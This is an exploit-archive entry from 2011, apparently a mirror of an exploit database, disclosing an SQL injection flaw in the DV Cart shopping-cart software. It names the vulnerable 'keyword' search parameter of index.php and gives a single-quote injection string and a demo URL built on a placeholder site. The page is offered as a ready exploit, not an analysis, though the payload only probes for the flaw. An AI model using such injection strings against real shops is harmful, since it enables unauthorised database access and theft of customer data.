[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DV Cart Shopping Cart software SQL Injection Vulnerability
# Published : 2011-08-22
# Author :
# Previous Title : WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
# Next Title : Wordpress Image Gallery with Slideshow plugin <= 1.5 Multiple Vulnerabilities


# Exploit Title: DV Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.esmistudio.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO

Exploit:
index.php?keyword='1&mod=search&submit=GO

Demo:
http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO